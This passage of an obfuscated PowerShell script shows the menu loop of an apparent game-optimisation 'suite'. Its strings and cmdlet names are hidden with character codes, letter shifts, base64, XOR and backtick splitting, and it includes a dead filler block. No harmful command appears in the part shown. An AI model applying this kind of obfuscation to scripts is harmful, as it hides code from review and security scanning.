    &((-join([char]0x57, [char]0x72, [char]0x49, [char]0x54, [char]0x45, [char]0x2D, [char]0x48, [char]0x4F, [char]0x73))+('{0}' -f 'T')) ($(-join(' ['.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+8)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+8)%26))}else{[char]$c}})) + $(172 / 43) + $(-join(']  KDOZ YAOZK'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}}))) -fOregroUNdcOlOr red
    &((-join([char]0x57, [char]0x72, [char]0x69, [char]0x54, [char]0x45, [char]0x2D, [char]0x68, [char]0x6F, [char]0x53))+'Т') ([System.Text.Encoding]::UTF8.GetString([byte[]](0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D,0x3D))) -fOregROuNDCOlOr cyaN
}
try {
    throw "Intentionally skipping this block";
    $xmlDoc = [xml]::new(); $rootElement = $xmlDoc.CreateElement("Config"); $childElement = $xmlDoc.CreateElement("Setting"); $childElement.InnerText = (Get-Random); $rootElement.AppendChild($childElement) | Out-Null; $xmlDoc.AppendChild($rootElement) | Out-Null; Write-Verbose "Generated XML fragment: $($xmlDoc.OuterXml)"
} catch {}

# --- RUnTiME enTrY bOOtstrapPEr ---
$unreFG = ShO`w-aUthSCReEn
if ($uNreFG) {
    do {
        sh`ow-welComEhEAdER
		WriTe-HosT ''
        $CdqJr4Am = &($(-join('wJfi-mT'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}}))+('{0}' -f 'st')) ((-join('Select e','xec','ution p','a','th (')) + $(70 % 23) + '-' + $(96 - 92) + ')')
        switch ($cdQJR4AM) {
            '1' { glOBaL-oPtimIZE }
            ('{0}' -f '2') { GamE-QoSPOliCy }
            '3' { gLobAL-ROlLBaCk }
            '4' { WRiTE-h`Ost ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}' -f '``n','Ex','iti','n','g',' ','Suit','e. G','G, ','Hav','e Fun','! '); break }
            &("$([char]0x64)$([char]0x45)$([char]0x66)$([char]0x41)$([char]0x75)$([char]0x6C)"+'t') { &(('wR'+'iTe')+$(-join('-yFjK'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}}))) ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52YWxpZCBwYXJhbWV0ZXIgdGFyZ2V0LiBUcnkgYWdhaW4u'))) -fOreGroUNDColOr reD; sTart-s`leep -SEcONds (12 / 12) }
        }
    } while ($CDQJR4Am -ne $($k5417=216;$b=[byte[]](0xec);-join($b|%{[char]($_-bxor$k5417)})))
}
Get-Host | Select-Object -ExpandProperty Version | Out-Null
